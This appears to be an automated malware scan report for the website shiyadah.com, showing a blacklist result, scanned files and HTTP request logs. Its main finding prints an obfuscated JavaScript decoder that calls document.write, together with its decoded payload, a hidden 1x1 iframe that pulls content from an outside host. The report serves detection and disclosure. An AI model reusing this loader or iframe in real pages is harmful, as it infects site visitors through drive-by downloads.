Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shiyadah.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shiyadah.com/ | 200 OK Content-Length: 1154 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,9,55,53,40,23,1,59,0,0,0,0,0,0,0,41,58,16,26,47,24,35,36,46,48,29,42,62,5,49,7,19,37,57,52,11,45,25,50,4,44,15,0,0,0,0,17,0,27,51,33,2,56,38,14,3,31,61,60,22,43,34,54,12,21,30,13,20,6,28,18,10,8,32);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("VWkI6PpW965SpOvSsFRctrEcshpbd3vSEryQOl546apfOovS_6j1xKEbBhV1wusbBTpbTgjSTCYNxwZjgZLRd62RGPiQ5igRqugegak81PZ0mPHIGTLRSh0RcPgfErefVKybhisNyhkfOd")
Decoded script:
<iframe width="1" height="1" src="http://hu587tiugi.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>
Antivirus reports:
http://shiyadah.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://shiyadah.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shiyadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 01:56:12 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 1154
Content-Type: text/html
Last-Modified: Thu, 17 Feb 2011 03:04:11 GMT
...1154 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shiyadah.com
Referer: http://www.google.com/search?q=shiyadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.